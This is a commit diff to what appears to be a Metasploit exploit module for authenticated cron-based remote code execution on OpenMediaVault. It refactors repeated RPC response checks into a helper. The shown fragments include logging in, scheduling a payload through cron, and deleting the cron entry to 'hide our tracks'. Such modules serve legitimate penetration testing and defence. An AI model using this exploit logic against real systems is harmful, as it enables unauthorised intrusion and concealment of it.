Addressed two more review comments

h00die-gr3y · h00die-gr3y · commit 7ad152694a19 · 2024-07-04T20:49:17.000Z
diff --git a/modules/exploits/multi/http/openmediavault_auth_cron_rce.rb b/modules/exploits/multi/http/openmediavault_auth_cron_rce.rb
@@ -84,6 +84,10 @@ def pass
     datastore['PASSWORD']
   end
 
+  def rpc_success?(res)
+    res&.code == 200 && res.body.include?('"error":null')
+  end
+
   def login(user, pass)
     print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
     res = send_request_cgi({
@@ -120,7 +124,7 @@ def check_version
         }
       }.to_json
     })
-    return nil unless res && res.code == 200 && res.body.include?('"error":null')
+    return nil unless rpc_success?(res)
 
     # parse json response and get the version
     res_json = res.get_json_document
@@ -135,7 +139,7 @@ def check_version
 
   def apply_config_changes
     # Apply OpenMediaVault configuration changes
-    return send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/rpc.php'),
       'method' => 'POST',
       'ctype' => 'application/json',
@@ -193,7 +197,7 @@ def execute_command(cmd, _opts = {})
       'keep_cookies' => true,
       'data' => post_data
     })
-    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless res && res.code == 200 && res.body.include?('"error":null')
+    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless rpc_success?(res)
 
     # parse json response and get the uuid of the cron entry
     # we need this later to clean up and hide our tracks
@@ -222,10 +226,10 @@ def on_new_session(_session)
         options: nil
       }.to_json
     })
-    if res && res.code == 200 && res.body.include?('"error":null')
+    if rpc_success?(res)
       # Apply changes and update cron configuration to remove the payload entry
       res = apply_config_changes
-      if res && res.code == 200 && res.body.include?('"error":null')
+      if rpc_success?(res)
         print_good('Cron payload entry successfully removed.')
       else
         print_warning('Cannot apply the cron changes to remove the payload entry.')
